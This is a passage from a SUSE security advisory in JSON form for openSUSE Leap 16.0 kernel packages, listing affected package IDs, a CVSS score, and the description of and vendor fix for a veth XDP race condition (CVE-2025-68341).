"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68341",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68341"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nveth: reduce XDP no_direct return section to fix race\n\nAs explain in commit fa349e396e48 (\"veth: Fix race with AF_XDP exposing\nold or uninitialized descriptors\") for veth there is a chance after\nnapi_complete_done() that another CPU can manage start another NAPI\ninstance running veth_pool(). For NAPI this is correctly handled as the\nnapi_schedule_prep() check will prevent multiple instances from getting\nscheduled, but for the remaining code in veth_pool() this can run\nconcurrent with the newly started NAPI instance.\n\nThe problem/race is that xdp_clear_return_frame_no_direct() isn\u0027t\ndesigned to be nested.\n\nPrior to commit 401cb7dae813 (\"net: Reference bpf_redirect_info via\ntask_struct on PREEMPT_RT.\") the temporary BPF net context\nbpf_redirect_info was stored per CPU, where this wasn\u0027t an issue. Since\nthis commit the BPF context is stored in \u0027current\u0027 task_struct. When\nrunning veth in threaded-NAPI mode, then the kthread becomes the storage\narea. Now a race exists between two concurrent veth_pool() function calls\none exiting NAPI and one running new NAPI, both using the same BPF net\ncontext.\n\nRace is when another CPU gets within the xdp_set_return_frame_no_direct()\nsection before exiting veth_pool() calls the clear-function\nxdp_clear_return_frame_no_direct().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68341",
"url": "https://www.suse.com/security/cve/CVE-2025-68341"
},
{
"category": "external",
"summary": "SUSE Bug 1255506 for CVE-2025-68341",
"url": "https://bugzilla.suse.com/1255506"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
